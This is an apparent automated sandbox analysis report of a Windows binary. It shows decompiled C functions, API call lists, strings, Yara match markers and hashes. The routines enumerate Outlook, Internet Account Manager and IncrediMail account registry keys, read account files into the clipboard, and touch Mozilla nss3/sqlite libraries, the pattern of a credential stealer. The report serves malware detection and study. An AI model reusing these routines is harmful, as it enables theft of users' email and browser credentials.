							_t60 = E0040F276(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}


























                                                                                                                                                                  0x00402c1e
                                                                                                                                                                  0x00402c1e
                                                                                                                                                                  0x00402c36
                                                                                                                                                                  0x00402c3b
                                                                                                                                                                  0x00402c42
                                                                                                                                                                  0x00402c55
                                                                                                                                                                  0x00402c58
                                                                                                                                                                  0x00402c5e
                                                                                                                                                                  0x00402c6e
                                                                                                                                                                  0x00402c73
                                                                                                                                                                  0x00402c78
                                                                                                                                                                  0x00402c80
                                                                                                                                                                  0x00402c85
                                                                                                                                                                  0x00402c85
                                                                                                                                                                  0x00402ca0
                                                                                                                                                                  0x00402cb2
                                                                                                                                                                  0x00402cb8
                                                                                                                                                                  0x00402cd1
                                                                                                                                                                  0x00402ce4
                                                                                                                                                                  0x00402ce9
                                                                                                                                                                  0x00402cec
                                                                                                                                                                  0x00402cee
                                                                                                                                                                  0x00402cf6
                                                                                                                                                                  0x00402cf6
                                                                                                                                                                  0x00402d0f
                                                                                                                                                                  0x00402d22
                                                                                                                                                                  0x00402d27
                                                                                                                                                                  0x00402d2a
                                                                                                                                                                  0x00402d2c
                                                                                                                                                                  0x00402d36
                                                                                                                                                                  0x00402d36
                                                                                                                                                                  0x00402d3b
                                                                                                                                                                  0x00402d4b
                                                                                                                                                                  0x00402d50
                                                                                                                                                                  0x00402d53
                                                                                                                                                                  0x00402d5c
                                                                                                                                                                  0x00402d60
                                                                                                                                                                  0x00402d60
                                                                                                                                                                  0x00402d66
                                                                                                                                                                  0x00402d69
                                                                                                                                                                  0x00402d71

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  • memset.MSVCRT ref: 00402C5E
                                                                                                                                                                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D60
                                                                                                                                                                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                  • memset.MSVCRT ref: 00402CB8
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402CD1
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402D0F
                                                                                                                                                                    • Part of subcall function 00402B92: memset.MSVCRT ref: 00402BB2
                                                                                                                                                                    • Part of subcall function 00402B92: RegCloseKey.ADVAPI32 ref: 00402C16
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                  • API String ID: 1831126014-3814494228
                                                                                                                                                                  • Opcode ID: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                                                                                                                                                                  • Instruction ID: 6132c75c80fc905e8fcbbac6237d45e27d646b3e48d82405447337ab985425ff
                                                                                                                                                                  • Opcode Fuzzy Hash: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                                                                                                                                                                  • Instruction Fuzzy Hash: 66314072D0011DBADB21EA91CD42EEF7B7CAF18345F0404BABA14F2091E7B49F888B54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405FD0, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00405FD0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E00405ED5(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);
					_t5 = _t36 + 1; // 0x1
					_t29 = GlobalAlloc(0x2000, _t5);
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                                                                                                                                  0x00405fd6
                                                                                                                                                                  0x00405fda
                                                                                                                                                                  0x00405fe3
                                                                                                                                                                  0x00405fec
                                                                                                                                                                  0x00405fef
                                                                                                                                                                  0x00406065
                                                                                                                                                                  0x00405ff1
                                                                                                                                                                  0x00405ffd
                                                                                                                                                                  0x00405fff
                                                                                                                                                                  0x0040600e
                                                                                                                                                                  0x00406012
                                                                                                                                                                  0x00406048
                                                                                                                                                                  0x0040604e
                                                                                                                                                                  0x00406014
                                                                                                                                                                  0x0040601d
                                                                                                                                                                  0x00406030
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406032
                                                                                                                                                                  0x00406033
                                                                                                                                                                  0x00406037
                                                                                                                                                                  0x00406040
                                                                                                                                                                  0x00406040
                                                                                                                                                                  0x00406030
                                                                                                                                                                  0x00406054
                                                                                                                                                                  0x0040605c
                                                                                                                                                                  0x00406068
                                                                                                                                                                  0x00406072

                                                                                                                                                                  APIs
                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00405FDA
                                                                                                                                                                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FF7
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406008
                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 00406015
                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406028
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406037
                                                                                                                                                                  • SetClipboardData.USER32 ref: 00406040
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00406048
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406054
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040605F
                                                                                                                                                                  • CloseClipboard.USER32 ref: 00406068
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3604893535-0
                                                                                                                                                                  • Opcode ID: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                                                                                                                                                                  • Instruction ID: 46ab690def339a2f00972c0b4152e32a3d13c207705114ffa6be22e44c23a91c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                                                                                                                                                                  • Instruction Fuzzy Hash: A0112875544205BFDB10AFA4AC48B9A7FB8EB08316F118176F906E22A1DB748A44CA69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F44C, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • strcpy.MSVCRT(?,Common Programs,0040F56A,?,?,?,?,?,00000104), ref: 0040F4BF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy
                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                  • API String ID: 3177657795-318151290
                                                                                                                                                                  • Opcode ID: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                                                                                                                                                                  • Instruction ID: 3fcc29bccd1c625ad2997487a879199120d1d943b4c0761a6650e27991626466
                                                                                                                                                                  • Opcode Fuzzy Hash: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                                                                                                                                                                  • Instruction Fuzzy Hash: B9F01D732BEE0A60D43405681F06EF70402A0F17553BA86336D42F5ED6E9BC888E60AF
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402F9C, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00402F9C(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040F1B0(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040F276(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040F232(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040F1B0(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040F276(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D74(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040F276(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040F276(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}

























                                                                                                                                                                  0x00402f9c
                                                                                                                                                                  0x00402f9c
                                                                                                                                                                  0x00402fa7
                                                                                                                                                                  0x00402fb5
                                                                                                                                                                  0x00402fba
                                                                                                                                                                  0x00402fc1
                                                                                                                                                                  0x00402fd6
                                                                                                                                                                  0x00402fd9
                                                                                                                                                                  0x00402fdf
                                                                                                                                                                  0x00402fef
                                                                                                                                                                  0x00402ff4
                                                                                                                                                                  0x004030db
                                                                                                                                                                  0x00403014
                                                                                                                                                                  0x00403026
                                                                                                                                                                  0x0040302c
                                                                                                                                                                  0x00403044
                                                                                                                                                                  0x00403057
                                                                                                                                                                  0x0040305c
                                                                                                                                                                  0x00403061
                                                                                                                                                                  0x0040306c
                                                                                                                                                                  0x0040306f
                                                                                                                                                                  0x00403075
                                                                                                                                                                  0x00403085
                                                                                                                                                                  0x0040308a
                                                                                                                                                                  0x004030b6
                                                                                                                                                                  0x00403099
                                                                                                                                                                  0x0040309e
                                                                                                                                                                  0x004030ae
                                                                                                                                                                  0x004030b3
                                                                                                                                                                  0x004030b3
                                                                                                                                                                  0x004030bd
                                                                                                                                                                  0x004030bd
                                                                                                                                                                  0x004030c3
                                                                                                                                                                  0x004030d3
                                                                                                                                                                  0x004030d8
                                                                                                                                                                  0x004030d8
                                                                                                                                                                  0x004030e6
                                                                                                                                                                  0x004030ec
                                                                                                                                                                  0x004030ed
                                                                                                                                                                  0x004030f6

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  • memset.MSVCRT ref: 00402FDF
                                                                                                                                                                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                  • memset.MSVCRT ref: 0040302C
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403044
                                                                                                                                                                  • memset.MSVCRT ref: 00403075
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004030BD
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004030E6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                  • API String ID: 3672803090-3168940695
                                                                                                                                                                  • Opcode ID: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                                                                                                                                                                  • Instruction ID: 768b3681e431995c61ece500f3f0ca2292d3b8ebaed2eb0df27a6a0be2325633
                                                                                                                                                                  • Opcode Fuzzy Hash: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                                                                                                                                                                  • Instruction Fuzzy Hash: 27316FB680020DBFDB21EB51CC81EEE7B7CAF14344F0041B6B908A1151E7799F989F65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407BCE, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00407BCE(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E00412360(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407BCE(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4181b4 =  *0x4181b4 + 1;
								_t64 =  *0x4181b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407EF3(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}











                                                                                                                                                                  0x00407bce
                                                                                                                                                                  0x00407bd1
                                                                                                                                                                  0x00407bd9
                                                                                                                                                                  0x00407be4
                                                                                                                                                                  0x00407bee
                                                                                                                                                                  0x00407bf2
                                                                                                                                                                  0x00407bf6
                                                                                                                                                                  0x00407d1c
                                                                                                                                                                  0x00407d22
                                                                                                                                                                  0x00407bfc
                                                                                                                                                                  0x00407c01
                                                                                                                                                                  0x00407c08
                                                                                                                                                                  0x00407c0d
                                                                                                                                                                  0x00407c14
                                                                                                                                                                  0x00407c23
                                                                                                                                                                  0x00407c2e
                                                                                                                                                                  0x00407c36
                                                                                                                                                                  0x00407c3a
                                                                                                                                                                  0x00407c46
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407c50
                                                                                                                                                                  0x00407cf4
                                                                                                                                                                  0x00407cf4
                                                                                                                                                                  0x00407cf8
                                                                                                                                                                  0x00407cfa
                                                                                                                                                                  0x00407cfb
                                                                                                                                                                  0x00407cff
                                                                                                                                                                  0x00407d02
                                                                                                                                                                  0x00407d07
                                                                                                                                                                  0x00407d07
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407cf8
                                                                                                                                                                  0x00407c56
                                                                                                                                                                  0x00407c64
                                                                                                                                                                  0x00407c6b
                                                                                                                                                                  0x00407c77
                                                                                                                                                                  0x00407c7c
                                                                                                                                                                  0x00407c83
                                                                                                                                                                  0x00407c87
                                                                                                                                                                  0x00407c8c
                                                                                                                                                                  0x00407c9a
                                                                                                                                                                  0x00407ca6
                                                                                                                                                                  0x00407ca6
                                                                                                                                                                  0x00407c8e
                                                                                                                                                                  0x00407c92
                                                                                                                                                                  0x00407c92
                                                                                                                                                                  0x00407c8c
                                                                                                                                                                  0x00407cb5
                                                                                                                                                                  0x00407cbd
                                                                                                                                                                  0x00407cbe
                                                                                                                                                                  0x00407cc4
                                                                                                                                                                  0x00407cd2
                                                                                                                                                                  0x00407cd8
                                                                                                                                                                  0x00407cd8
                                                                                                                                                                  0x00407cee
                                                                                                                                                                  0x00407cee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407d0a
                                                                                                                                                                  0x00407d0a
                                                                                                                                                                  0x00407d0e
                                                                                                                                                                  0x00407d12
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407c01

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                  • API String ID: 1757351179-3849865405
                                                                                                                                                                  • Opcode ID: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                                                                                                                                                                  • Instruction ID: b54eda8ed3125ae11668051ec90bd02c66b6cc1d7fa6bc8d4742b266666783d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                                                                                                                                                                  • Instruction Fuzzy Hash: 01319E7280C384AFD7209F55D84099BBBE9FF88354F14893EF59492250D379EA44CB6B
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EFF9, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F02A
                                                                                                                                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F075
                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                                                                                                                                                                  Strings
                                                                                                                                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040F032
                                                                                                                                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F011
                                                                                                                                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F01E
                                                                                                                                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F025
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                  • API String ID: 1640410171-2022683286
                                                                                                                                                                  • Opcode ID: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                                                                                                                                                                  • Instruction ID: b02d4c6ee9d97a63d35e72255114f680a0148db4ebcc5a4c1265e43ba903851c
                                                                                                                                                                  • Opcode Fuzzy Hash: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C115B7251012EAACB21EEA4DD40EFB37ECAB48354F050537FD41E3241EA74E9598BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404841, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00404841(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                                  0x0040484e
                                                                                                                                                                  0x00404855
                                                                                                                                                                  0x0040485c
                                                                                                                                                                  0x0040485e
                                                                                                                                                                  0x00404866
                                                                                                                                                                  0x0040486a
                                                                                                                                                                  0x00404894
                                                                                                                                                                  0x00404894
                                                                                                                                                                  0x0040489c
                                                                                                                                                                  0x0040489d
                                                                                                                                                                  0x004048a2
                                                                                                                                                                  0x004048bf
                                                                                                                                                                  0x004048a4
                                                                                                                                                                  0x004048b1
                                                                                                                                                                  0x004048ba
                                                                                                                                                                  0x004048ba
                                                                                                                                                                  0x004048a2
                                                                                                                                                                  0x00404872
                                                                                                                                                                  0x0040487a
                                                                                                                                                                  0x00404880
                                                                                                                                                                  0x00404883
                                                                                                                                                                  0x00404883
                                                                                                                                                                  0x00404886
                                                                                                                                                                  0x0040488e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404890
                                                                                                                                                                  0x00404890
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404890

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(comctl32.dll,76D24DE0,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404860
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404886
                                                                                                                                                                  • #17.COMCTL32(?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404894
                                                                                                                                                                  • MessageBoxA.USER32 ref: 004048B1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                                                                  • Opcode ID: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                                                                                                                                                                  • Instruction ID: fc2202cf77027b42572104eeb985269ec1b891a521d9ed4889cd7b549b4d3d81
                                                                                                                                                                  • Opcode Fuzzy Hash: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                                                                                                                                                                  • Instruction Fuzzy Hash: E001D6767906527BD7116FA09C4ABAF7EECDB85B4BB008435F602F1180EA78DE02825C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E507, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040E507() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}







                                                                                                                                                                  0x0040e51d
                                                                                                                                                                  0x0040e526
                                                                                                                                                                  0x0040e528
                                                                                                                                                                  0x0040e532
                                                                                                                                                                  0x0040e534
                                                                                                                                                                  0x0040e537
                                                                                                                                                                  0x0040e537
                                                                                                                                                                  0x0040e53b
                                                                                                                                                                  0x0040e53e
                                                                                                                                                                  0x0040e53e
                                                                                                                                                                  0x0040e542
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e545
                                                                                                                                                                  0x0040e54b

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(nss3.dll,76D257D0,?,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E516
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E51F
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E528
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E537
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E53E
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E545
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
